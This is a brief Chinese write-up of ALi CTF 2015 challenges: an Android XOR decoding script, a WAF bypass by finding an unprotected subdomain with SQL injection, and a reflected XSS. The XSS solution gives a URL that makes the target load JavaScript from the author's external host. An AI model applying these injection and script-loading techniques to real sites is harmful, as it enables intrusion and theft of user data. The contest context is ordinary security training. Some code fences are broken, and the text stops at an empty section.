# ALi CTF 2015 write up Authors: EMcnevilmoon@gmail.com Ricterricterzheng@gmail.com [附件](http://drops.wooyun.org/wp-content/uploads/2015/04/%E9%99%84%E4%BB%B6.tar.gz) 0x00 Cake ========= * * * Cake 是一题 Android 题,具体流程就是一个输入一个字符串然后,初始化一个长度为16的数组,然后将字符串与这个数组 xor 。所以我们只需要再 xor 一下就 ok 了。 就是看代码逆向下,关键是有两个 Key 找对就 ok 直接上代码 ``` a = [0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42] b = 'bobdylan' s = '' i = 0 for x in a: s+= chr(x ^ ord(b[i % len(b)])) i += 1 print s ``` 0x01 渗透绕过WAF1 ============= * * * 2、绕过云 WAF1 是一题绕过 WAF 题,这个 WAF 写的很死,所以就要用其他办法咯~ 通过打开的弹窗提示,需要在`.alictf.com`的子域下面做,于是 fuzz 子域名: ![enter image description here](https://superkieran.github.io/wooyun-img/b95fd0335355e26369c4564409eb36b6d2e4405d.jpg) 得出`video.alictf.com`,打开发现没有 waf,注入点为`id`。 ![enter image description here](https://superkieran.github.io/wooyun-img/fcfb1981979a60b0e64ce593fdd0782ad52123ef.jpg) 0x02 前端初赛题1 =========== * * * 反射型 XSS,通过 ph 牛的[文章](http://www.leavesongs.com/PENETRATION/XDCTF-2014-Writeup.html),``标签内` ``` 读 JavaScript 代码,构造地址: ``` http://ef4c3e7556641f00.alictf.com/xss.php?http://notexist.example.com:@notexist.example.com:@ricter.me:9999/ ``` 加载的 JavaScript 脚本和 XSS100 相同。 0x10 简单业务逻辑2 ============ * * * ```